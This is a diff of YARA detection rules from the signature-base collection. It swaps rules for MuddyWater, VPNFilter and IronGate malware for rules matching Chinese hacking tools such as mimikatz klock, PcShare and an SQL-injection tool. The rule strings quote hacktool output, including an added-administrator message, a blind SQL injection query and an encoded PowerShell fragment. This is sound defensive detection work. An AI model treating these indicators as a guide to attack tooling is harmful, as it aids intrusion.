+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L404-L419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7268c79baf37174e04b391ae42cdd6014f17478c5b89d0c7b8042eb839324f87"
+		hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6"
+		logic_hash = "9e14db3721afaba3ea5e9767afff593bf2b137306fe673acd7926bf6efc78391"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5"
 
 	strings:
-		$x1 = "cracked by ximo" ascii
-		$s1 = "Yqrfpk" fullword ascii
-		$s2 = "IVVTOC" fullword ascii
+		$s2 = "IdtTool.sys" fullword ascii
+		$s4 = "Idt Tool bY tMd[CsP]" fullword wide
+		$s6 = "\\\\.\\slIdtTool" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Xored_Mozilla_Oct19
+rule SIGNATURE_BASE_Goodtoolset_Ms11046 : FILE
 {
 	meta:
-		description = "Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key."
-		author = "Florian Roth"
-		id = "71e5b399-c384-5330-ae52-4e0a806e7969"
-		date = "2019-10-28"
-		modified = "2023-11-03"
-		old_rule_name = "SUSP_XORed_Mozilla"
-		reference = "https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L2-L25"
+		description = "Chinese Hacktool Set - file ms11046.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4703861-02a9-5d93-b6de-c3664ca8abb9"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L421-L438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e1b5c7a0adb4dc65cdf0a653255ac865a0ecebbf1ff08b7fc46d510d5e8aa6c9"
-		score = 60
+		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
+		logic_hash = "2fb36a589613f97d0c3a4da58c65352689062a8ba6d432b5f3cf3b51a7e77f8c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xo1 = "Mozilla/5.0" xor ascii wide
-		$xof1 = "Mozilla/5.0" ascii wide
-		$fpa1 = "Sentinel Labs" wide
-		$fpa2 = "<filter object at" ascii
-		$fpb1 = { 64 65 78 0a 30 33 35 }
+		$s1 = "[*] Token system command" fullword ascii
+		$s2 = "[*] command add user 90sec 90sec" fullword ascii
+		$s3 = "[*] Add to Administrators success" fullword ascii
+		$s4 = "[*] User has been successfully added" fullword ascii
+		$s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
 
 	condition:
-		$xo1 and not $xof1 and not 1 of ( $fpa* ) and not $fpb1 at 0
+		uint16( 0 ) == 0x5a4d and filesize < 840KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_Xored_MSDOS_Stub_Message : FILE
+rule SIGNATURE_BASE_Cmdshell32 : FILE
 {
 	meta:
-		description = "Detects suspicious XORed MSDOS stub message"
-		author = "Florian Roth"
-		id = "9ab52434-9162-5fd5-bf34-8b163f6aeec4"
-		date = "2019-10-28"
-		modified = "2023-10-11"
-		reference = "https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L27-L56"
+		description = "Chinese Hacktool Set - file Cmdshell32.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f1dfb5a1-4292-5895-8310-913cfdf4d9d0"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L440-L455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6d7d7242511d2c26122fe2b880cfe39facb5f68ae45e19c1558163f0427c304"
-		score = 55
+		hash = "3c41116d20e06dcb179e7346901c1c11cd81c596"
+		logic_hash = "cfe3d72d33d7a3c2b70d4fa0767a921c1cfcd360b2094af40b067789cace95af"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xo1 = "This program cannot be run in DOS mode" xor(0x01-0xff) ascii wide
-		$xo2 = "This program must be run under Win32" xor(0x01-0xff) ascii wide
-		$fp1 = "AVAST Software" fullword wide ascii
-		$fp2 = "AVG Netherlands" fullword wide ascii
-		$fp3 = "AVG Technologies" ascii wide
-		$fp4 = "Malicious Software Removal Tool" wide
-		$fp5 = "McAfee Labs" fullword ascii wide
-		$fp6 = "Kaspersky Lab" fullword ascii wide
-		$fp7 = "<propertiesmap>" ascii wide
-		$fp10 = "Avira Engine Module" wide
-		$fp11 = "syntevo GmbH" wide fullword
-		$fp13 = "SophosClean" ascii
-		$fp14 = "SophosHomeClean" wide
+		$s1 = "cmdshell.exe" fullword wide
+		$s2 = "cmdshell" fullword ascii
+		$s3 = "[Root@CmdShell ~]#" fullword wide
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* ) and not uint16( 0 ) == 0xb0b0 and not uint16( 0 ) == 0x5953
+		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
 }
-rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_1 : FILE
+rule SIGNATURE_BASE_Sniffer_Analyzer_Ssclone_1210_Full_Version : FILE
 {
 	meta:
-		description = "Detects malicious document used by MuddyWater"
+		description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5f275ee8-c6a9-532b-bc82-b109195171da"
-		date = "2018-02-26"
+		id = "69dac4bf-483d-5888-a748-1a52cf372066"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research - TI2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_muddywater.yar#L10-L26"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L457-L473"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b675b004f86695821737b7fc05276c8350e44f5822ec458a74658f895ccf7082"
+		hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e"
+		logic_hash = "982a213a106794e2cddb6148b3d3a119ae17fc318ad03237da1018e1859523d7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
 
 	strings:
-		$x1 = "aWV4KFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmco" ascii
-		$x2 = "U1FCdUFIWUFid0JyQUdVQUxRQkZBSGdBY0FCeUFHVUFjd0J6QUdrQWJ3QnVBQ0FBS"
+		$s0 = "http://www.vip80000.com/hot/index.html" fullword ascii
+		$s1 = "GetConnectString" fullword ascii
+		$s2 = "CnCerT.Safe.SSClone.dll" fullword ascii
+		$s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3580KB and all of them
 }
-rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_2 : FILE
+rule SIGNATURE_BASE_X64_Klock : FILE
 {
 	meta:
-		description = "Detects malicious document used by MuddyWater"
+		description = "Chinese Hacktool Set - file klock.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "117e1d33-63a3-52c8-acf6-bc61959193db"
-		date = "2018-02-26"
+		id = "7065a4fb-c867-5a94-b6bb-5b60085bea15"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research - TI2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_muddywater.yar#L28-L46"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L475-L491"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b198396d27b32f8aa57a25cd6e33deb2bcfb726731e2e07f8b9d50b5f6ff13a0"
+		hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
+		logic_hash = "3fe00c08607d20daa055db2f551009ff1c447f1a651d4a78aba91621d53424f5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
-		hash2 = "366d8b84a43a528e6aaf9ecfc38980b148f983967803914471ccf011b9bb0832"
 
 	strings:
-		$s1 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" fullword wide
-		$s2 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
-		$s3 = "*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Office16\\MSWORD.OLB#Microsoft Word 16.0 O" wide
-		$s4 = "scripting.filesystemobject$" fullword ascii
-		$s5 = "ID=\"{00000000-0000-0000-0000-000000000000}\"" fullword ascii
+		$s1 = "Bienvenue dans un processus distant" fullword wide
+		$s2 = "klock.dll" fullword ascii
+		$s3 = "Erreur : le bureau courant (" wide
+		$s4 = "klock de mimikatz pour Windows" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 6000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Muddywater_Droppedtask_Jun18_1 : FILE
+rule SIGNATURE_BASE_Dos_Down32 : FILE
 {
 	meta:
-		description = "Detects a dropped Windows task as used by MudyWater in June 2018"
+		description = "Chinese Hacktool Set - file Down32.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d9ef379d-161f-59f1-873e-3af12b24b76b"
-		date = "2018-06-12"
+		id = "e56c254d-1238-5786-8e8a-f9122b0310a9"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/719c94eb-0a00-47cc-b583-ad4f9e25ebdb"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_muddywater.yar#L48-L66"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L493-L508"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "776ae1adab223ae258d1c1c0c501e177dafe196964a2ede31789a7caa8495b2d"
+		hash = "0365738acd728021b0ea2967c867f1014fd7dd75"
+		logic_hash = "c1aaaaaaae2ea720d3fc1516d88d678895bcda81344e8c1f4f57e5a20e770123"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ecc2e1817f655ece2bde39b7d6633f4f586093047ec5697a1fab6adc7e1da54"
 
 	strings:
-		$x1 = "%11%\\scrobj.dll,NI,c:" wide
-		$s1 = "AppAct = \"SOFTWARE\\Microsoft\\Connection Manager\"" fullword wide
-		$s2 = "[DefenderService]" fullword wide
-		$s3 = "UnRegisterOCXs=EventManager" fullword wide
-		$s4 = "ShortSvcName=\" \"" fullword wide
+		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
+		$s6 = "down.exe" fullword wide
+		$s15 = "get_Form1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize < 1KB and ( 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 137KB and all of them
 }
-rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_1 : FILE
+rule SIGNATURE_BASE_Marathontool_2 : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Chinese Hacktool Set - file MarathonTool.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dc50cb37-a6e7-5eb5-9581-31d7fd005e47"
-		date = "2018-05-24"
+		id = "20151673-6779-58ce-872c-81e74a96597d"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L11-L31"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L510-L525"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aff7b1f3d4afaf883c2702287ef7d6e13e01e80222ba336978d13deb21a93614"
+		hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c"
+		logic_hash = "7581b63a7bddeac93c65b2943b9f5f568464d8f300bc7385ca73880996bd390b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344"
 
 	strings:
-		$s1 = "Login=" fullword ascii
-		$s2 = "Password=" fullword ascii
-		$s3 = "%s/rep_%u.bin" fullword ascii
-		$s4 = "%s:%uh->%s:%hu" fullword ascii
-		$s5 = "Password required" fullword ascii
-		$s6 = "password=" fullword ascii
-		$s7 = "Authorization: Basic" fullword ascii
-		$s8 = "/tmUnblock.cgi" fullword ascii
+		$s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide
+		$s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide
+		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_2 : FILE
+rule SIGNATURE_BASE_Scanms_Scanms : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Chinese Hacktool Set - file scanms.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95356303-e8ba-585d-b2fc-af9e10b0b93f"
-		date = "2018-05-24"
+		id = "50393220-35ae-5d3b-ae3f-5d5eb036c043"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L33-L48"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L527-L544"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "238ec4575fd8adbfa592e07b601313c71a08be8c776e78469aef8ad02e411798"
+		hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a"
+		logic_hash = "d6b33e603953194dab67104cbb9649710515050cf73afb18b2c9083a9e228e6d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec"
 
 	strings:
-		$s1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)" fullword ascii
-		$s2 = "passwordPASSWORDpassword" fullword ascii
-		$s3 = "/tmp/client.key" fullword ascii
+		$s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii
+		$s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii
+		$s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii
+		$s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii
+		$s5 = "Internet Explorer 1.0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them
 }
-rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_3 : FILE
+rule SIGNATURE_BASE_CN_Tools_Pcshare : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Chinese Hacktool Set - file PcShare.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "020603bf-fbce-5de1-82b9-5a2dfacfada3"
-		date = "2018-05-24"
+		id = "0c4e9f9b-9839-56a0-be21-a4e9f19cdfdb"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L50-L78"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L546-L565"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71152b57f2d6040608febf32441e1899fdf2479335c26c1143ea58759e6d9094"
+		hash = "ee7ba9784fae413d644cdf5a093bd93b73537652"
+		logic_hash = "57bd1629abe0af1345f505514b99deb4e63ebce7363f3b0abcb76e7201d9b7b7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92"
-		hash2 = "9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17"
-		hash3 = "37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4"
-		hash4 = "0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b"
-		hash5 = "4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b"
-		hash6 = "8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1"
-		hash7 = "776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d"
 
 	strings:
-		$sx1 = "User-Agent: Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)" fullword ascii
-		$sx2 = "Execute by shell[%d]:" fullword ascii
-		$sx3 = "CONFIG.TOR.name:" fullword ascii
-		$s1 = "Executing command:  %s %s..." fullword ascii
-		$s2 = "/proc/%d/cmdline" fullword ascii
-		$a1 = "Mozilla/5.0 Firefox/50.0" fullword ascii
-		$a2 = "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
-		$a3 = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
+		$s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide
+		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide
+		$s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide
+		$s5 = "port=%s;name=%s;pass=%s;" fullword wide
+		$s16 = "%s\\ini\\*.dat" fullword wide
+		$s17 = "pcinit.exe" fullword wide
+		$s18 = "http://www.pcshare.cn" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 1000KB and ( 1 of ( $sx* ) or 2 of ( $s* ) or 2 of ( $a* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_ELF_Tor_Client : FILE
+rule SIGNATURE_BASE_Pw_Inspector : FILE
 {
 	meta:
-		description = "Detects VPNFilter malware"
+		description = "Chinese Hacktool Set - file pw-inspector.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1be6528d-1b60-50da-8125-2ef73b8aeb4f"
-		date = "2018-05-24"
+		id = "888db647-c5d0-5b1b-bcd2-512c1ebeadea"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_vpnfilter.yar#L80-L95"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L567-L582"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2b67b32c5b8441c9b38e3bfeefa7f59c2767e29985adcba7d52e858847d37e47"
-		score = 65
+		hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215"
+		logic_hash = "3b54466d80692923b93689a9e43e30dfbc63e5982cb633120795817098d68e05"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719"
 
 	strings:
-		$x1 = "We needed to load a secret key from %s, but it was encrypted. Try 'tor --keygen' instead, so you can enter the passphrase." fullword ascii
-		$x2 = "Received a VERSION cell with odd payload length %d; closing connection." fullword ascii
-		$x3 = "Please upgrade! This version of Tor (%s) is %s, according to the directory authorities. Recommended versions are: %s" fullword ascii
+		$s1 = "-m MINLEN  minimum length of a valid password" fullword ascii
+		$s2 = "http://www.thc.org" fullword ascii
+		$s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 460KB and all of them
 }
-rule SIGNATURE_BASE_Irongate_APT_Step7Prosim_Gen : FILE
+rule SIGNATURE_BASE_Dll_Loadex : FILE
 {
 	meta:
-		description = "Detects IronGate APT Malware - Step7ProSim DLL"
+		description = "Chinese Hacktool Set - file Dll_LoadEx.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a73cf9e2-c24f-5553-92e2-3a1a882a4a06"
-		date = "2016-06-04"
+		id = "51235448-751e-51ce-93f8-da48eddb2b7f"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Mr6M2J"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irongate.yar#L10-L40"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L584-L603"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aab41ada32a8186f958baccad08b60ac1ab686f7561d4dd4471a1e88ddd53730"
-		score = 90
+		hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150"
+		logic_hash = "588f4f4d0a2f8f8e76de0a5b1217191c1cace69f934582d4fc3c974fb94b8c3e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0539af1a0cc7f231af8f135920a990321529479f6534c3b64e571d490e1514c3"
-		hash2 = "fa8400422f3161206814590768fc1a27cf6420fc5d322d52e82899ac9f49e14f"
-		hash3 = "5ab1672b15de9bda84298e0bb226265af09b70a9f0b26d6dfb7bdd6cbaed192d"
 
 	strings:
-		$x1 = "\\obj\\Release\\Step7ProSim.pdb" ascii
-		$s1 = "Step7ProSim.Interfaces" fullword ascii
-		$s2 = "payloadExecutionTimeInMilliSeconds" fullword ascii
-		$s3 = "PackagingModule.Step7ProSim.dll" fullword wide
-		$s4 = "<KillProcess>b__0" fullword ascii
-		$s5 = "newDllFilename" fullword ascii
-		$s6 = "PackagingModule.exe" fullword wide
-		$s7 = "$863d8af0-cee6-4676-96ad-13e8540f4d47" fullword ascii
-		$s8 = "RunPlcSim" fullword ascii
-		$s9 = "$ccc64bc5-ef95-4217-adc4-5bf0d448c272" fullword ascii
-		$s10 = "InstallProxy" fullword ascii
-		$s11 = "DllProxyInstaller" fullword ascii
-		$s12 = "FindFileInDrive" fullword ascii
+		$s0 = "WiNrOOt@126.com" fullword wide
+		$s1 = "Dll_LoadEx.EXE" fullword wide
+		$s3 = "You Already Loaded This DLL ! :(" ascii
+		$s10 = "Dll_LoadEx Microsoft " fullword wide
+		$s17 = "Can't Load This Dll ! :(" ascii
+		$s18 = "WiNrOOt" fullword wide
+		$s20 = " Dll_LoadEx(&A)..." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and ( $x1 or 3 of ( $s* ) ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 120KB and 3 of them
 }
-rule SIGNATURE_BASE_Irongate_Pyinstaller_Update_EXE : FILE
+rule SIGNATURE_BASE_Dat_Report : FILE
 {
 	meta:
-		description = "Detects a PyInstaller file named update.exe as mentioned in the IronGate APT"
+		description = "Chinese Hacktool Set - file report.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8d1b97e-86d9-547f-a212-a84fb068af3c"
-		date = "2016-06-04"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/Mr6M2J"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irongate.yar#L42-L62"
+		id = "c77633a7-0c2f-5efa-b58b-635546bfec95"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L605-L619"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b55e02af900b3510743502bd72d5e14c9235985b5a7b05def0f5c462b28f2216"
-		score = 60
+		hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2"
+		logic_hash = "e3b21f37fae388958758af535727844d6e9696862fd9968340e1a619592c53b6"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2044712ceb99972d025716f0f16aa039550e22a63000d2885f7b7cd50f6834e0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "bpython27.dll" fullword ascii
-		$s5 = "%s%s.exe" fullword ascii
-		$s6 = "bupdate.exe.manifest" fullword ascii
-		$s9 = "bunicodedata.pyd" fullword ascii
-		$s11 = "distutils.sysconfig(" ascii
-		$s16 = "distutils.debug(" ascii
-		$s18 = "supdate" fullword ascii
+		$s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii
+		$s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 480KB and all of them
 }
-rule SIGNATURE_BASE_Nirsoft_Netresview : FILE
+rule SIGNATURE_BASE_Dos_Iis7 : FILE
 {
 	meta:
-		description = "Detects NirSoft NetResView - utility that displays the list of all network resources"
+		description = "Chinese Hacktool Set - file iis7.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf786432-3ecf-510e-8d95-50aff09826ce"
-		date = "2016-06-04"
+		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
+		date = "2015-06-13"
 		modified = "2023-12-05"
